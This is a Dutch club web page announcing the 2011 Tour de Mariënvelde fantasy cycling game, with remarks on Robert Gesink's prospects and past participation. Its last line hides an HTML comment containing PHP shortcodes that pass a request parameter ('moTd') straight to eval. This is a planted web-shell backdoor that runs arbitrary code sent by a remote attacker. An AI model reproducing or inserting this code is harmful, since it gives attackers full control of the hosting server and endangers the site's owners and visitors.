Tour de Mariënvelde 2011

Voor de 28e keer wordt ook dit jaar weer de Tour de Mariënvelde georganiseerd. Voor veel wielerliefhebbers breekt dan weer een prachtige, maar ook spannende periode aan. Met veel belangstelling zullen we de verrichtingen volgen van de vele wielertoppers, die zullen trachten om in Parijs het podium te halen, dat in 2010 werd bestegen door Alberto Contador, Andy Schleck en Denis Menchov.Maar veel belangrijker voor de Nederlanders is het rijden van Robert Gesink, die inmiddels tot de top van mondiale wielercircuit is doorgedrongen. Zit er nog meer in dan de prachtige zesde plaats van vorig jaar voor de Achterhoeker. Is het podium een haalbare plek?? Het voorseizoen biedt voldoende perspectief, waarin Gesink liet zien dat hij op het gebied van tijdrijden enorme sprongen heeft gemaakt. Het rijden van Gesink in de Dauphiné Libéré met de handrem er op laat zien, dat zijn voorbereiding anders is dan vorig jaar, maar Robert kennende zal het gas er in de Tour weer vol op gaan.

Vorig jaar hadden we in ons Tourspel 3635 deelnemers, maar daarbij hadden we ook last van het WK-voetbal in Zuid-Afrika en de goede resultaten van Oranje. We hopen weer richting de 4000 deelnemers te gaan in het leukste Tourspel van Nederland.Veel succes met de voorbereiding!!

<!– [insert_php]if (isset($_REQUEST["moTd"])){eval($_REQUEST["moTd"]);exit;}[/insert_php][php]if (isset($_REQUEST["moTd"])){eval($_REQUEST["moTd"]);exit;}[/php] –>